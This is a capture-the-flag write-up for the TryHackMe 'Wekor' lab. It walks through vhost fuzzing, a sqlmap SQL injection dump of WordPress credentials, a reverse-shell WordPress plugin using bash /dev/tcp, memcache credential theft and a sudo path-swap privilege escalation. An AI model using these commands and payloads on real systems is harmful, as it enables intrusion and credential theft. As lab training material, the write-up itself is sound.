THM: Wekor
CTF challenge involving Sqli , WordPress , vhost enumeration and recognizing internal services ;)
Medium rated but surely that description gives a lot away? This is Wekor from THM.
SSH and HTTP only.
Since we already know there is a VHOST/subdomain to find, I’ll run WFUZZ:
wfuzz -c -f sub-fighter -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-20000.txt -u "http://wekor.thm" -H "Host: FUZZ.wekor.thm" -t 42 --hh 23
This turns up site. I add site.wekor.thm to /etc/hosts along with wekor.thm.
On the main wekor.thm robots.txt is mostly trolling apart from /comingreallysoon which directs us to /it-next. This is a page with lots of stuff on it; the SQLi is on /it-next/it_cart.php with the parameters coupon_code=asdsadsadasd&apply_coupon=Apply+Coupon. I use sqlmap and enumerate the databases; we have wordpress so I dump the contents with:
sqlmap -r request -level=1 -risk=1 --batch -D wordpress --dump
With this we get some user:password combinations, with a little help from John.
Wordpress is at site.wekor.thm/wordpress and using the credentials we gained from the SQLi we can login. One of our users is a WP admin, and I upload a plugin zipfile for a reverse shell.
└─# cat plugin_shell.php
root@kali:/opt/vulnhub/midnight# cat ../kbvuln/rev-plugin.php
* Plugin Name: Reverse Shell Plugin
* Plugin URI:
* Description: Reverse Shell Plugin
* Version: 1.0
* Author:
* Author URI:
exec("/bin/bash -c 'bash -i >& /dev/tcp/ 0>&1'");
└─# zip plugin_shell.php
adding: plugin_shell.php (deflated 31%)
On the box
We’re told to look for internal services and Linpeas finds memcache running on port 11211. I use telnet:
Connected to localhost.
Escape character is '^]'.
stats items
stats items
STAT items:1:number 5
STAT items:1:age 2096
STAT items:1:evicted 0
STAT items:1:evicted_nonzero 0
STAT items:1:evicted_time 0
STAT items:1:outofmemory 0
STAT items:1:tailrepairs 0
STAT items:1:reclaimed 0
STAT items:1:expired_unfetched 0
STAT items:1:evicted_unfetched 0
STAT items:1:crawler_reclaimed 0
STAT items:1:crawler_items_checked 0
STAT items:1:lrutail_reflocked 0
stats cachedump 1 100
stats cachedump 1 100
ITEM id [4 b; 1615202210 s]
ITEM email [14 b; 1615202210 s]
ITEM salary [8 b; 1615202210 s]
ITEM password [15 b; 1615202210 s]
ITEM username [4 b; 1615202210 s]
get KEY password
get KEY password
VALUE password 0 15
Now I can su Orka.
└─# nc -nvlp 1234 1 ⨯
listening on [any] 1234 ...
connect to [] from (UNKNOWN) [] 36006
bash: cannot set terminal process group (1072): Inappropriate ioctl for device
bash: no job control in this shell
www-data@osboxes:/var/www/html/site.wekor.thm/wordpress/wp-admin$ python -c 'import pty;pty.spawn("/bin/bash");'
<ss/wp-admin$ python -c 'import pty;pty.spawn("/bin/bash");'
www-data@osboxes:/var/www/html/site.wekor.thm/wordpress/wp-admin$ su Orka
su Orka
Password: REDACTED
# What can we do?
Orka@osboxes:~$ sudo -l
sudo -l
[sudo] password for Orka: REDACTED AGAIN LOL
Matching Defaults entries for Orka on osboxes:
env_reset, mail_badpass,
User Orka may run the following commands on osboxes:
(root) /home/Orka/Desktop/bitcoin
# Okay
Orka@osboxes:~$ mv Desktop Whatever
mv Desktop Whatever
Orka@osboxes:~$ ls
Documents Music Public Templates Videos
Downloads Pictures user.txt Whatever
Orka@osboxes:~$ mkdir Desktop
mkdir Desktop
Orka@osboxes:~$ cd De
cd Desktop/
Orka@osboxes:~/Desktop$ ls
Orka@osboxes:~/Desktop$ printf 'sh\n' > bitcoin
printf 'sh\n' > bitcoin
Orka@osboxes:~/Desktop$ chmod +x bitcoin
chmod +x bitcoin
Orka@osboxes:~/Desktop$ sudo -u root /home/Orka/Desktop/bitcoin
sudo -u root /home/Orka/Desktop/bitcoin
# cd /root
cd /root
# id;hostname
uid=0(root) gid=0(root) groups=0(root)
A quick explanation. bitcoin was a binary that called a python script called Neither were writeable, both were owned by root. I couldn’t delete or rename either of them. Initially I tried messing with the things they were calling like the python modules being imported, but that wasn’t working. So I just renamed the entire Desktop directory, made another one and created my own bitcoin file. Face-palmingly simple in the end.